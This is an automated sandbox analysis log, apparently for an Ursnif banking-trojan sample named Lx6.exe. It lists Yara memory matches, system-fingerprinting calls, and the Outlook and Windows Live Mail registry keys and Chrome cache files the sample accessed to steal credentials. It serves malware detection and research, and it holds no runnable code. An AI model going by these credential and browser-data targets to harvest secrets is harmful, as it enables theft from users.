Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076B568 cpuid 0_2_0076B568
Source: C:\Users\user\Desktop\Lx6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401927 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401927
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076915C GetUserNameA,GetSystemTimeAsFileTime,HeapFree, 0_2_0076915C
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076D4C8 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0076D4C8
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_004019F9 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_004019F9

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000e Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000f Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000c Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000d Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_0 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000001 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000002 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000010 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000011 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000005 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000003 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000004 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_1 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000009 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_2 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_3 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000007 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\index Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000008 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000a Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000b Jump to behavior

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
